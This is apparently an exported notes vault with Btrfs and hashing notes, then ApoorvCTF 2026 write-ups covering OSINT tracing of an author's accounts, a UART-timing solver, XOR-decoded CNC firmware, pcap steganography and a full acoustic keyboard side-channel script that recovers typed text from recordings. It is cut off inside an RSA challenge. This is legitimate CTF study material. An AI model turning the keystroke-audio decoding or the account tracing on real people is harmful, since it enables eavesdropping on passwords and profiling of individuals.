0xnhl

[Vault: Linux] BTRFS

Sat, 28 Mar 2026 13:57:25 GMT

Btrfs (B-tree File System) is a modern GPL-licensed [[Copy-on-Write (CoW)]] file system for Linux aimed at implementing advanced features while focusing on fault tolerance, repair, and easy administration. It is designed to address the lack of pooling, snapshots, checksums, and integral multi-device spanning in older Linux file systems. Developed by Oracle, Red Hat, Intel, and others, it supports large storage capacities, subvolumes, snapshots, compression, and built-in RAID.

Core Features

Copy-on-Write (CoW): When data is modified, it is written to a new location rather than overwriting the old data. This prevents data corruption during power losses.
Subvolumes: Essentially independent file trees within the main file system. They look like normal directories but can be mounted separately and snapshot independently.
Snapshots: Instantaneous, read-only (or read-write) point-in-time copies of a subvolume, made possible by CoW.
Checksumming: Both data and metadata are checksummed (typically using CRC32C) to detect silent data corruption.
Self-Healing: If a checksum fails and the system is in a RAID configuration, Btrfs will automatically fetch a good copy of the data from another drive.

Important Commands Reference

Btrfs administration is centralized under the btrfs command-line utility.

1. File System Creation & Info

Commands used for formatting drives and checking general file system health.

Format a drive:
```
mkfs.btrfs /dev/sdX
```
Format multiple drives (e.g., RAID 1 for data and metadata):
```
mkfs.btrfs -m raid1 -d raid1 /dev/sdX /dev/sdY
```
Show file system usage:
```
btrfs filesystem df /mount/point
```
Show overall Btrfs disk usage and device info:
```
btrfs filesystem show
```

2. Subvolumes

Subvolumes are the building blocks of a Btrfs deployment.

Create a subvolume:

btrfs subvolume create /mount/point/subvol_name

Delete a subvolume:

btrfs subvolume delete /mount/point/subvol_name

List all subvolumes:
```
btrfs subvolume list /mount/point
```
[!tip] Mounting Subvolumes To mount a specific subvolume via /etc/fstab, use its ID or name: mount -o subvol=subvol_name /dev/sdX /mnt/target.

3. Snapshots

Because of CoW, snapshots take up almost zero space initially. They only grow as the original data changes.

Create a snapshot:

btrfs subvolume snapshot /mount/point/source_subvol /mount/point/snapshot_name

Create a read-only snapshot (ideal for backups):

btrfs subvolume snapshot -r /mount/point/source_subvol /mount/point/snapshot_name

4. Device Management

Btrfs allows you to add or remove drives on the fly without unmounting the file system.

Add a device:
```
btrfs device add /dev/sdZ /mount/point
```
Remove a device (Btrfs will safely migrate data off it first):
```
btrfs device remove /dev/sdX /mount/point
```

5. Maintenance & Repair

Routine maintenance is crucial for keeping Btrfs healthy and performant.

Scrub (Check for and repair data corruption):
```
btrfs scrub start /mount/point
```
Check scrub status:
```
btrfs scrub status /mount/point
```
Balance (Reallocate data chunks across disks): Useful after adding/removing devices, or to reclaim space from partially empty chunks.
```
btrfs balance start /mount/point
```
Defragmentation (Fixes fragmentation caused by CoW):
```
btrfs filesystem defragment -r /mount/point
```

DOCS

https://en.wikipedia.org/wiki/Btrfs https://docs.kernel.org/filesystems/btrfs.html https://btrfs.readthedocs.io/en/latest/

[Vault: Cryptography] Hashing

Sat, 28 Mar 2026 13:57:24 GMT

Hashing serves the purpose of ensuring integrity, i.e. making it so that if something is changed you can know that it’s changed. Technically, hashing takes arbitrary input and produce a fixed-length string that has the following attributes:

The same input will always produce the same output.
Multiple disparate inputs should not produce the same output.
It should not be possible to go from the output to the input.
Any modification of a given input should result in drastic change to the hash.

Hashing is used in conjunction with authentication to produce strong evidence that a given message has not been modified. This is accomplished by taking a given input, hashing it, and then signing the hash with the sender’s private key. When the recipient opens the message, they can then validate the signature of the hash with the sender’s public key and then hash the message themselves and compare it to the hash that was signed by the sender. If they match it is an unmodified message, sent by the correct person.

Examples: SHA-3, MD5, etc.

Hash Functions

Hash functions are algorithms that produce a code that can't be decrypted.

Hash functions have been around since the early days of computing. They were originally created as a way to quickly search for data. Since the beginning, these algorithms have been designed to represent data of any size as small, fixed-size values, or digests. Using a hash table, which is a data structure that's used to store and reference hash values, these small values became a more secure and efficient way for computers to reference data.

MD5

One of the earliest hash functions is Message Digest 5, more commonly known as MD5. Professor Ronald Rivest of the Massachusetts Institute of Technology (MIT) developed MD5 in the early 1990s as a way to verify that a file sent over a network matched its source file. Message Digest 5 (MD5) is a cryptographic hash function that takes any input and produces a 128-bit hexadecimal number. The output of an MD5 hash function is called a digest. MD5 digests are often used to verify the integrity of files or data; however, MD5 is no longer considered secure and should not be used for sensitive applications. Whether it’s used to convert a single email or the source code of an application, MD5 works by converting data into a 128-bit value. You might recall that a bit is the smallest unit of data measurement on a computer. Bits can either be a 0 or 1. In a computer, bits represent user input in a way that computers can interpret. In a hash table, this appears as a string of 32 characters. Altering anything in the source file generates an entirely new hash value. Generally, the longer the hash value, the more secure it is. It wasn’t long after MD5's creation that security practitioners discovered 128-bit digests resulted in a major vulnerability.

Hash collisions

One of the flaws in MD5 happens to be a characteristic of all hash functions. Hash algorithms map any input, regardless of its length, into a fixed-size value of letters and numbers. What’s the problem with that? Although there are an infinite amount of possible inputs, there’s only a finite set of available outputs! MD5 values are limited to 32 characters in length. Due to the limited output size, the algorithm is considered to be vulnerable to hash collision, an instance when different inputs produce the same hash value. Because hashes are used for authentication, a hash collision is similar to copying someone’s identity. Attackers can carry out collision attacks to fraudulently impersonate authentic data.

Next-generation hashing

To avoid the risk of hash collisions, functions that generated longer values were needed. MD5's shortcomings gave way to a new group of functions known as the Secure Hashing Algorithms, or SHAs. The National Institute of Standards and Technology (NIST) approves each of these algorithms. Numbers besides each SHA function indicate the size of its hash value in bits. Except for SHA-1, which produces a 160-bit digest, these algorithms are considered to be collision-resistant. However, that doesn’t make them invulnerable to other exploits. Five functions make up the SHA family of algorithms:

SHA-1
SHA-224
SHA-256
SHA-384
SHA-512

SHA-256

Secure Hash Algorithm 256 bits (SHA-256) is a cryptographic hash function that takes any input and produces a 256-bit hexadecimal number. SHA-256 is often used to verify the integrity of files or data and to create digital signatures. SHA-256 is considered very secure and is widely used in applications such as Bitcoin and blockchain technology.

[Vault: Root] Cybersecurity

Sat, 28 Mar 2026 13:57:24 GMT

Cybersecurity (or security)

[!IMPORTANT] The practice of ensuring confidentiality, integrity, and availability of information by protecting networks, devices, people, and data from unauthorized access or criminal exploitation.

Key terms and concepts

A hacker is any person who uses computers to gain access to computer systems, networks, or data.

Compliance is the process of adhering to internal standards and external regulations and enables organizations to avoid fines and security breaches.
Security frameworks are guidelines used for building plans to help mitigate risks and threats to data and privacy. ^696cbb
Security controls are safeguards designed to reduce specific security risks. They are used with security frameworks to establish a strong security posture.
Security posture is an organization’s ability to manage its defense of critical assets and data and react to change. A strong security posture leads to lower risk for the organization.
A threat actor, or malicious attacker, is any person or group who presents a security risk. This risk can relate to computers, applications, networks, and data.
An internal threat can be a current or former employee, an external vendor, or a trusted partner who poses a security risk. At times, an internal threat is accidental. For example, an employee who accidentally clicks on a malicious email link would be considered an accidental threat. Other times, the internal threat actor intentionally engages in risky activities, such as unauthorized data access.
Network security is the practice of keeping an organization's network infrastructure secure from unauthorized access. This includes data, services, systems, and devices that are stored in an organization’s network.
Cloud security is the process of ensuring that assets stored in the cloud are properly configured, or set up correctly, and access to those assets is limited to authorized users. The cloud is a network made up of a collection of servers or computers that store resources and data in remote physical locations known as data centers that can be accessed via the internet. Cloud security is a growing subfield of cybersecurity that specifically focuses on the protection of data, applications, and infrastructure in the cloud.
Personally identifiable information (PII): Any information used to infer an individual’s identity
Sensitive personally identifiable information (SPII): A specific type of PII that falls under stricter handling guidelines.

Core skills for cybersecurity professionals

Transferable skills: Communication, Problem-solving, Time management, Growth mindset, Diverse perspectives
Technical skills: Programming languages, Security information and event management (SIEM) tools, Intrusion detection systems (IDSs), Threat landscape knowledge, Incident response, Malware prevention

Security Risks

Security Frameworks

Threats

Vulns and attacks

CISSP Domains

[Vault: Writeups / apoorvctf2026 / osint] journey

Tue, 24 Mar 2026 12:46:02 GMT

Description

Well the author of this challenge uses discord. flag format: apoorvctf{first_part_second_part_third_part} Author : makeki

Checking out the Apoorvctf discord, channel we find the author ![[attachments/journey-a5dd27cb-cf28-4e0c-b7ec-c152426cdeca.png]] ![[attachments/journey-5e777b44-8aab-41bf-b134-3654af537317.png]]

![[attachments/journey-aa88a2d1-56fa-4d36-901a-08fd6cde6796.png]] from reddit found this

apk mlqf fgmminbvrwtftr? ecqpegf mi otw mnwn lh jqtygw mlqf scw hyb vj ngn hwa'x aaoi qa e rsoi. Ab ztyxxi vw xf mlm smawl :(, ixfxtag kwg e bsbp nesb s webvrv kbxm. Smgkm tiex dx mlm sppy bw nvvhl ymdr gwskekgigk hj bui hmunmpx dx mlig ibsbp.

vigenere cipher decode

KEY: EPSTEIN
was this bruteforceable? anyways it was easy to figure this one out if you don't live in a cave. So vegeta is in the files :(, epstein got a mail from a dating site. First part of the flag is first five characters of the subject of that email.

![[attachments/journey-969e514b-4827-443f-a234-c28ecd95027c.png]]

first part of flag is : gggeb

From reddit i got roblox username ![[attachments/journey-7e042730-760f-431e-94a6-eff912f00b23.png]] There i found a community ![[attachments/journey-16db043f-934c-4cb9-a933-12d568d4809f.png]] And got codeforces username: MughliGhutti https://codeforces.com/profile/MughliGhutti ![[attachments/journey-81dbb978-ca8a-44c5-ba32-ea03c5d6a312.png]] The QR gives link https://www.youtube.com/watch?v=tg8Jahz6RM4 ![[attachments/journey-e6a79ba9-8e25-43ec-b8a3-067deae945aa.png]]

Part 2:_C0d3_f0rc3s_

Also from we get to know about a blog https://m4k3k1.blogspot.com/ ![[attachments/journey-3cea2969-b631-4d38-acbc-e4f333720f14.png]] ![[attachments/journey-d41c0fee-397a-4384-88b9-0d6b80cf1cf7.png]] found this from the blog

aWYgeW91IGFyZSBsb29raW5nIGZvciBhIGZsYWcgaGVyZSwgY29uZ3JhdHMuIFRoZSBsYXN0IHBhcnQgb2YgdGhlIGZsYWcgaXMgdGhlIG1vYmlsZSBudW1iZXIgKDEwIGRpZ3RzKSBvZiB0aGUgc3RheSB3ZSBzdGF5ZWQgYXQuIFlvdSBjb3VsZCBmaW5kIGl0IG9uIHRoZSBzb2NpYWxzIG9mIHRoYXQgc3RheS4=

b64 decrypt gave

if you are looking for a flag here, congrats. The last part of the flag is the mobile number (10 digts) of the stay we stayed at. You could find it on the socials of that stay.

google image search on the image indicated it was chokramudi peak. ![[attachments/journey-9f8bfc5a-81a5-4d29-9472-1d4a4696d77f.png]] The blog said something about "pine" and also described features of a church. and also 1 km from the chokramudi trekking point ![[attachments/journey-cd3f276e-b345-4df3-a32f-33224f22221a.png]] With some trial and error we find skylark homes as the correct stay. And we can find their mobile no there. third part of flag is : 9447332138

[!tip] Final flag is : apoorvctf{gggeb_C0d3_f0rc3s_9447332138}

[Vault: Writeups / apoorvctf2026 / hw] Resonance Lock The Harmonic Multiplier

Tue, 24 Mar 2026 11:51:15 GMT

"In the buried vaults of Site-7, you found a scorched circuit board labeled HARMONIX-7. The SoC is barely alive — its supercapacitor holds just 45 seconds of charge once the clock locks. The datasheet fragment says the chip has a hardware multiplier that produces a diagnostic token when exercised, but only after the UART crystal oscillator is phase-locked to exactly 2,345,679 baud. One wrong harmonic and the token is garbage.

A charred sticky note on the board reads:

⚠ DO NOT ATTEMPT FIRMWARE DUMP — HSM tamper fuse will permanently detune oscillator. Chip will respond but all readings will be garbage. There is no recovery. You have been warned."

Challenge Summary

We are given a remote service that emulates a UART calibration and hardware-multiplier flow:

Connect to chals4.apoorvctf.xyz:1337
Enter calibration mode
Send a calibration trigger byte
Send timed 0x55 bursts until oscillator lock
In locked mode, send one multiplier request: 0xAA + A(64B) + B(64B)
Receive fixed flag token before the 45s supercap timeout

Expected flag format: apoorvctf{...}

Initial Triage and Reality Check

The description mentions:

PPM feedback lines like ERR:+00123 / ERR:-00045
lock when |error| <= 1000 for 5 consecutive bursts
avoid any protocol mistakes or tamper fuse blows

During live interaction, the actual service behavior was slightly different:

Sending CALIBRATE\n (newline) caused immediate tamper
Sending exactly CALIBRATE (no newline) worked
Calibration replies were repeated EXEC_TIME:268380 lines, then LOCKED
After LOCKED, one extra calibration burst caused tamper

So the exploit/solver must obey the practical wire behavior, not just the text prompt.

Protocol Notes That Matter

No newline after CALIBRATE
- Use sock.sendall(b"CALIBRATE")
Send trigger byte 0xCA
- Single byte, no framing extras
Calibration burst format
- Exactly 64 bytes of 0x55
- Byte-spaced for target UART baud
Stop calibration immediately when LOCKED appears
- Do not send another 0x55 burst
Locked payload format
- Exactly 0xAA + 64-byte A + 64-byte B
- Any valid operands are accepted (flag is constant)
Use TCP_NODELAY and byte-by-byte timing
- Prevent packet coalescing/Nagle jitter

Timing Math

UART 8N1 means 10 bits transmitted per byte.

Target baud:

2,345,679 bits/s

Inter-byte period:

10 / 2,345,679 s = 4.263... microseconds

Nanoseconds used by script:

BYTE_NS = round(10 * 1e9 / 2_345_679) = 4263 ns

Because sleep() is too coarse for this scale, a busy-wait loop on time.perf_counter_ns() is used.

Exploitation Strategy

Create TCP socket and enable TCP_NODELAY
Send CALIBRATE (no newline)
Send one byte 0xCA
Repeatedly send timed 64-byte 0x55 bursts
Parse responses until LOCKED
Immediately send timed payload:
- opcode 0xAA
- A = 1 encoded as 64-byte big-endian
- B = 1 encoded as 64-byte big-endian
Read FLAG:...

I also included optional parsing for the documented ERR:+/-PPM format, so the solver can auto-adjust spacing if that variant appears.

Solver Script

Saved as:

hw/solve_uart_lock.py

Run:

python3 hw/solve_uart_lock.py

Recovered Flag

apoorvctf{3N7R0P1C_31D0L0N_0F_7H3_50C_4N4LY57_N0C7URN3}

Why This Works

The service only gates flag output behind a timing-based lock state.
Once lock is achieved, multiplier operands are not semantically important for the flag.
Any syntactically valid 512-bit operand pair is enough to trigger fixed token disclosure.
Strict byte-level protocol adherence avoids tripping the session tamper fuse.

Pitfalls / Dead Ends Encountered

Sending CALIBRATE\n caused ERR:HSM_TAMPER_FUSE_BLOWN
Sending an extra calibration burst after LOCKED caused tamper
Sending payload as one bulk write after lock often tampered; timed byte send was stable

These are exactly the kind of implementation details that matter more than prompt text in CTF infra.

[Vault: Writeups / apoorvctf2026 / hw] Dead Reckoning

Tue, 24 Mar 2026 11:48:29 GMT

Challenge

Category: Reverse Engineering / Hardware Forensics
Difficulty: Medium

Challenge Description

A damaged embedded CNC controller was discovered at an abandoned research facility. The machine was mid-job when the power got cut. The engineers said the machine was engraving something important before it died. Can you recover what it was making and find the flag in the process? The flag contains the characters f' to identify it when you see it. The only file the team was able to recover from the CNC machine is the binary file last loaded onto the embedded controller. Good luck.

We are given one file: controller_fw.bin.

Story hint says the CNC machine was engraving something important, and the flag content contains f'....

Expected final format: apoorvctf{...}.

1) Fast Triage

File type and strings

file controller_fw.bin
strings -n 6 controller_fw.bin

Key observations from strings:

Firmware/banner-like strings: AXIOM-CNC fw v2.3.1
Job-related hints:
- job_buffer: packet format [4B:length][1B:seg_id][NB:data] x4 segments
- JOB BUFFER FRAGMENTED
Debug hint:
- cal_reserved (0x0C18): DO NOT MODIFY
Markers in binary:
- JBUFHDR5SEG4
- AXIOM_END

This strongly suggests embedded job data exists in 4 fragmented packets, probably obfuscated/encrypted.

2) Locate Important Offsets

I scanned offsets for known markers and found:

JBUFHDR5SEG4 at 0x1000
AXIOM_END near EOF
file size 0x5010 (20496 bytes)

Hex around 0x1000 looked like:

0x1000: JBUFHDR5SEG4
0x100C: 92 0f 00 00 03 ...

Interpreting with hinted format [4B:length][1B:seg_id][NB:data]:

0x00000f92 = 3986 bytes, seg_id = 3
followed by next packet, etc.

3) Parse Fragmented Job Packets

I parsed 4 packets sequentially from 0x100C:

seg 3: length 3986
seg 0: length 1580
seg 2: length 2767
seg 1: length 246

Reordered by segment ID (0,1,2,3) to reconstruct logical job stream.

4) Recover Obfuscation Key

From strings, this value stood out:

cal_reserved (0x0C18): DO NOT MODIFY

Hex dump at 0x0C18:

f1 4c 3b a7 2e 91 c4 08

Testing this as repeating XOR key over packet payload produced clear ASCII G-code immediately.

Recovered XOR key:

f14c3ba72e91c408

This is the core trick of the challenge: job packets are XOR-obfuscated with the cal_reserved bytes.

5) Decrypt Result = CNC G-code

After XOR-decrypting each segment with the 8-byte repeating key, plaintext shows valid G-code, e.g.:

%
(AXIOM CNC CONTROLLER v2.3.1)
(job_id: 0x3F2A  seg:1/4)
G21
M3
G00 Z5.000000
G00 X35.105656 Y72.065903
G01 Z-1.000000 F100.0
...
M5
G00 X0.0000 Y0.0000
M2
%

So firmware did indeed contain the engraving toolpath.

6) Reconstruct the Engraving Geometry

I rendered the path by:

treating G01 as line segments
approximating G02/G03 arcs with short line samples
only drawing moves while Z < 0 (cutting depth)

The rendered output clearly spells:

f'GS

Therefore flag content is f'GS.

7) Final Flag

apoorvctf{f'GS}

If the platform enforces typographic apostrophe from statement wording, alternate try:

apoorvctf{f’GS}

Repro Script (Single-File)

#!/usr/bin/env python3
from pathlib import Path
import re, math
import numpy as np
import cv2

fw = Path("controller_fw.bin").read_bytes()

# 1) parse 4 packets from job buffer
off = 0x100C
segments = []
for _ in range(4):
    ln = int.from_bytes(fw[off:off+4], "little")
    sid = fw[off+4]
    data = fw[off+5:off+5+ln]
    segments.append((sid, data))
    off += 5 + ln

# 2) key from cal_reserved offset
key = fw[0x0C18:0x0C20]  # f1 4c 3b a7 2e 91 c4 08

def xor_rep(data, key):
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))

dec = b"".join(xor_rep(d, key) for _, d in sorted(segments, key=lambda x: x[0]))
Path("controller_job_dec.bin").write_bytes(dec)

text = dec.decode("ascii", errors="ignore")
print("--- GCODE PREVIEW ---")
print("\n".join(text.splitlines()[:20]))

# 3) render toolpath
lines = [ln.strip() for ln in text.splitlines() if ln.strip() and not ln.strip().startswith("(") and ln.strip() != "%"]

x = y = z = 0.0
draw_segments = []

for ln in lines:
    m = re.search(r"G(\d\d)", ln)
    cmd = "G" + m.group(1) if m else None
    p = {k: float(v) for k, v in re.findall(r"([XYZIJF])(-?\d+(?:\.\d+)?)", ln)}

    nx, ny, nz = p.get("X", x), p.get("Y", y), p.get("Z", z)
    if "Z" in p:
        z = nz
    cut = z < 0

    if cmd in ("G00", "G01"):
        if "X" in p or "Y" in p:
            if cut:
                draw_segments.append(((x, y), (nx, ny)))
            x, y = nx, ny

    elif cmd in ("G02", "G03"):
        I, J = p.get("I", 0.0), p.get("J", 0.0)
        cx, cy = x + I, y + J
        r = math.hypot(x - cx, y - cy)
        a0 = math.atan2(y - cy, x - cx)
        a1 = math.atan2(ny - cy, nx - cx)
        cw = cmd == "G02"
        if cw and a1 >= a0:
            a1 -= 2 * math.pi
        if (not cw) and a1 <= a0:
            a1 += 2 * math.pi

        steps = max(16, int(abs(a1 - a0) * max(r, 1) / 0.5))
        px, py = x, y
        for i in range(1, steps + 1):
            a = a0 + (a1 - a0) * i / steps
            qx, qy = cx + r * math.cos(a), cy + r * math.sin(a)
            if cut:
                draw_segments.append(((px, py), (qx, qy)))
            px, py = qx, qy
        x, y = nx, ny

pts = np.array([p for s in draw_segments for p in s], dtype=np.float64)
minx, miny = pts.min(axis=0)
maxx, maxy = pts.max(axis=0)

scale, pad = 8, 20
W = int((maxx - minx) * scale + 2 * pad)
H = int((maxy - miny) * scale + 2 * pad)
img = np.full((H, W), 255, np.uint8)

def tr(pt):
    xx = int(round((pt[0] - minx) * scale + pad))
    yy = int(round((maxy - pt[1]) * scale + pad))
    return xx, yy

for a, b in draw_segments:
    cv2.line(img, tr(a), tr(b), 0, 2, cv2.LINE_AA)

cv2.imwrite("controller_job_render.png", img)
print("Saved controller_job_render.png")
print("Visually read text as: f'GS")
print("Flag: apoorvctf{f'GS}")

Dead Ends / Notes

The string Qkkbal looked like Base64 bait; decoding it alone was not the path.
Searching for direct flag/apoorvctf strings in raw firmware fails (as expected due to obfuscation).
Key recovery depended on interpreting cal_reserved (0x0C18) as a real decryption material location.

[Vault: Writeups / apoorvctf2026 / forensics] Author on the Run

Tue, 24 Mar 2026 11:45:36 GMT

ApoorvCTF Forensics Writeup - Keyboard Audio Leakage

Challenge summary

Description: No time to explain! The organizers are after me — I stole the flag for you, by sneakily recording their keyboard. I managed to capture their keyboard keypresses before the event— every key (qwertyuiopasdfghjklzxcvbnm) pressed 50 times—don’t ask how. Then, while they were uploading the real challenge flag to CTFd, I left a mic running and recorded every keystroke. Now I’m on the run If the organizers catch you with this, you never saw me. Good luck — and hurry!

We are given two WAV files:

Reference.wav (training capture)
flag.wav (the real typed message)

Story hint says the attacker recorded each key from qwertyuiopasdfghjklzxcvbnm 50 times, then recorded the organizer typing the flag.

Expected format: apoorvctf{decoded_text}

Objective

Recover the text typed in flag.wav using Reference.wav as labeled training audio.

Initial triage

I first verified basic metadata.

file "Reference.wav" "flag.wav"

Output:

Reference.wav: RIFF (little-endian) data, WAVE audio, Microsoft PCM, 16 bit, mono 44100 Hz
flag.wav:      RIFF (little-endian) data, WAVE audio, Microsoft PCM, 16 bit, mono 44100 Hz

Then checked durations and audio parameters in Python:

import wave

for f in ["Reference.wav", "flag.wav"]:
    w = wave.open(f, "rb")
    print(
        f,
        "channels", w.getnchannels(),
        "rate", w.getframerate(),
        "width", w.getsampwidth(),
        "frames", w.getnframes(),
        "duration", w.getnframes() / w.getframerate(),
    )

Observed:

Reference.wav is long (~304.6 s), consistent with many sample keypresses.
flag.wav is short (~12.25 s), consistent with a short typed message.

Attack plan

Detect keypress onsets in both files using short-term energy.
Build per-letter templates from the reference file.
Classify each keypress in flag.wav by similarity to templates.
Wrap decoded text as apoorvctf{...}.

Important assumption (from prompt):

The 1300 reference keypresses are in blocks of 50 per letter in keyboard-order string: qwertyuiopasdfghjklzxcvbnm

So labels are:

first 50 onsets -> q
next 50 -> w
...
last 50 -> m

Solver script (full code used)

Save as solve.py in the same directory as the WAV files:

#!/usr/bin/env python3
import wave
import numpy as np

KEYS = "qwertyuiopasdfghjklzxcvbnm"


def load_wav(path: str):
    w = wave.open(path, "rb")
    x = np.frombuffer(w.readframes(w.getnframes()), dtype=np.int16).astype(np.float32)
    return x, w.getframerate()


def detect_onsets(x: np.ndarray, sr: int, min_gap_s: float, thr_mul: float = 4.0):
    """
    Detect keypress peaks from a smoothed absolute-amplitude envelope.
    """
    win = max(1, int(0.003 * sr))
    env = np.convolve(np.abs(x), np.ones(win) / win, mode="same")
    th = np.median(env) + thr_mul * np.std(env)
    min_gap = int(min_gap_s * sr)

    peaks = []
    amps = []
    i = 0
    n = len(env)

    while i < n:
        if env[i] > th:
            j = min(n, i + min_gap)
            k = i + int(np.argmax(env[i:j]))
            peaks.append(k)
            amps.append(env[k])
            i = j
        else:
            i += 1

    return np.array(peaks), np.array(amps)


def segment(x: np.ndarray, idx: int, L: int, pre: int):
    """
    Extract fixed-length window around onset with zero padding.
    """
    s = idx - pre
    out = np.zeros(L, dtype=np.float32)

    if s < 0:
        take = x[: max(0, s + L)]
        out[-s : -s + len(take)] = take
    else:
        take = x[s : s + L]
        out[: len(take)] = take

    return out


def feat_time(v: np.ndarray):
    v = v - np.mean(v)
    return v / (np.linalg.norm(v) + 1e-9)


def feat_fft(v: np.ndarray, bins: int = 300):
    sp = np.abs(np.fft.rfft(v * np.hanning(len(v))))
    f = np.log1p(sp)[:bins]
    return f / (np.linalg.norm(f) + 1e-9)


def main():
    xr, sr = load_wav("Reference.wav")
    xf, sf = load_wav("flag.wav")
    assert sr == sf, "Sample rates must match"

    # 1) Detect reference onsets.
    pr, ar = detect_onsets(xr, sr, min_gap_s=0.12, thr_mul=4.0)

    # Detector catches a few extras; keep strongest 1300 (= 26*50).
    keep = np.argsort(ar)[-1300:]
    pr = np.sort(pr[keep])

    # 2) Build labels by 50-key blocks.
    labels = np.array([KEYS[i // 50] for i in range(1300)])

    # 3) Feature extraction setup.
    L = int(0.10 * sr)   # 100 ms window
    pre = int(0.008 * sr)  # 8 ms pre-onset

    R_time = np.array([feat_time(segment(xr, p, L, pre)) for p in pr])
    R_fft = np.array([feat_fft(segment(xr, p, L, pre), bins=min(400, L // 2 + 1)) for p in pr])

    # 4) Class centroids for each key.
    C_time = {}
    C_fft = {}
    for k in KEYS:
        ct = R_time[labels == k].mean(0)
        cf = R_fft[labels == k].mean(0)
        C_time[k] = ct / (np.linalg.norm(ct) + 1e-9)
        C_fft[k] = cf / (np.linalg.norm(cf) + 1e-9)

    # 5) Detect flag onsets.
    # min_gap=0.16 suppresses occasional double-trigger from same key hit.
    pf, _ = detect_onsets(xf, sf, min_gap_s=0.16, thr_mul=4.0)

    # 6) Classify each flag keypress by cosine score.
    decoded = []
    for p in pf:
        ft = feat_time(segment(xf, p, L, pre))
        ff = feat_fft(segment(xf, p, L, pre), bins=min(400, L // 2 + 1))

        best_score = -1e9
        best_key = None
        for k in KEYS:
            score = float(ft @ C_time[k] + ff @ C_fft[k])
            if score > best_score:
                best_score = score
                best_key = k

        decoded.append(best_key)

    text = "".join(decoded)
    print("decoded_raw:", text)
    print("flag_candidate:", f"apoorvctf{{{text}}}")


if __name__ == "__main__":
    main()

Running it

python3 solve.py

Observed decode:

decoded_raw: ohyougotthisfzrdzmn

Interpreting the decode

Raw acoustic decode is very close to readable English and strongly suggests:

ohyougotthisfardamn

Why this is reasonable:

Most characters decode cleanly.
The uncertain positions are from neighboring keys with similar acoustic signatures.
ohyougotthisfardamn is a coherent phrase, while ohyougotthisfzrdzmn is not.

Final flag:

apoorvctf{ohyougotthisfardamn}

Notes on robustness

I tested multiple feature-window sizes and pre-onset offsets; the prefix ohyougotthis stayed stable.
Using too-small inter-peak gap on flag.wav can create duplicate detections for a single keypress; increasing min_gap_s from 0.12 to 0.16 fixed that.
Reference onset detector returned a few extras, so keeping the strongest 1300 events aligns exactly with the expected 26 * 50 samples.

[Vault: Writeups / apoorvctf2026 / forensics] Routine Checks

Tue, 24 Mar 2026 11:43:15 GMT

Routine System Checks (Forensics) - Detailed Writeup

Given file: challenge.pcap

Description: Routine system checks were performed on the city’s communication network after reports of instability. Operators sent brief messages between nodes to confirm everything was running smoothly. Most of the exchanges are ordinary status updates, but one message stands out as… different.

Expected flag format: `apoorvctf{...}`

1) Initial triage

First, identify what kind of traffic exists and where unusual data volume appears.

file challenge.pcap
tshark -r "challenge.pcap" -q -z io,phs
tshark -r "challenge.pcap" -q -z conv,tcp

Key observations:

Capture is standard Ethernet/IP/TCP (pcap, little-endian).
Most streams are small text-like payloads.
One stream stands out by size:
- 127.0.0.1:33610 -> 127.0.0.1:5001
- carries a large payload (5688 bytes) in a single packet.

That is immediately suspicious for hidden content.

2) Locate the suspicious payload

Inspect payload-bearing frames:

tshark -r "challenge.pcap" -Y "tcp.len>0" -T fields \
  -e frame.number -e tcp.stream -e tcp.srcport -e tcp.dstport -e data.len

The suspicious packet is:

frame 14, tcp.stream 1, 33610 -> 5001, data.len = 5688

Dump that payload as hex:

tshark -r "challenge.pcap" -Y "frame.number==14" -T fields -e data

The payload starts like:

3f d8 ff e0 00 10 4a 46 49 46 ...

JFIF appears, which strongly suggests JPEG data, but the first byte is 0x3f instead of expected JPEG SOI 0xff.

3) Reconstruct the hidden JPEG

Save payload and repair first byte.

# Save raw payload from frame 14 into stream1.bin
# (done via a short Python helper calling tshark)

# Patch first byte 0x3f -> 0xff and write stream1_fixed.jpg

After patching, validation confirms a real JPEG:

file stream1_fixed.jpg

Output indicates:

JPEG/JFIF
grayscale image
dimensions 99 x 99

At this point, the "different" message is not plain text; it is an embedded image sent over a TCP stream.

4) Decode the obvious visual payload (decoy)

Running QR decode on stream1_fixed.jpg gives:

apoorvctf{this_aint_it_brother}

But this is a fake flag.

So we continue deeper.

5) Check for second-layer hiding inside the JPEG

Since this is a simple forensics challenge and the QR is intentionally fake, the likely next step is classic image stego.

Check with steghide:

steghide info "stream1_fixed.jpg" -p ""

Important result:

Embedded file exists: realflag.txt
Embedded content is compressed + encrypted

Try extraction with empty passphrase (common CTF trick for "easy" stego layers):

steghide extract -sf "stream1_fixed.jpg" -p "" -f

This successfully extracts realflag.txt.

6) Recover final flag

Read extracted file:

cat realflag.txt

Recovered flag:

apoorvctf{b1ts_wh1sp3r_1n_th3_l0w3st_b1t}

Why this solve path is correct

The pcap mostly contains repetitive routine text, matching prompt narrative.
One TCP message is anomalous by payload size and binary structure.
That payload reconstructs into an image containing a decoy QR flag.
The real flag is hidden one layer deeper via stego (steghide embedded file).
Extraction is reproducible and deterministic from the original challenge.pcap.

Minimal reproducible command flow

# 1) Find unusual stream
tshark -r "challenge.pcap" -q -z conv,tcp

# 2) Dump suspicious payload (frame 14)
tshark -r "challenge.pcap" -Y "frame.number==14" -T fields -e data

# 3) Rebuild JPEG (patch first byte to ff)
#    -> stream1_fixed.jpg

# 4) Inspect stego container
steghide info "stream1_fixed.jpg" -p ""

# 5) Extract embedded file
steghide extract -sf "stream1_fixed.jpg" -p "" -f

# 6) Read final flag
cat realflag.txt

Final flag:

apoorvctf{b1ts_wh1sp3r_1n_th3_l0w3st_b1t}

[Vault: Writeups / apoorvctf2026 / cryptography] The Riddler's Cipher Delight

Tue, 24 Mar 2026 11:40:16 GMT

Challenge

Category: Cryptography Difficulty: Easy Given this python code:

# enc.py

# N =  17520886769422446781402845171452766678392945055507226042115591127790949038926405961588057901152880775198538951363849458511296788407527886190154759113620716962246342938913740398465525503895457929394994569820769711534794538522137993456194572001467194513826600891537022249206765745867423270603572791751504625621683522248065102814089587644651305112722919320696919194544558237008950904152753314856531469392976852299194227815343105809059455186267184706498969875531092067425496067267400027976328334687257293407409892934030446988318349271430705178690957392508571214791220858911022252486038830213798547638612103672306741523579
# e =  3
# c =  5959848254333830910624523071067197529743942832931749422613446095759596470869632698744448445022974243192082623200541274049999046045462632699888118125553180389758240097512080800465269924123706310996597928101365256237876736940573969864179631586328876422479408805381027940806738410297399027560825960052951200511768291312433697743253773594534719688371211151318607767527029263892621127356788516738086153844247429662752321125

from Crypto.Util.number import *

e = 3

while True:
	p = getPrime(1024)
	q = getPrime(1024)
	N = p*q
	phi = (p-1)*(q-1)

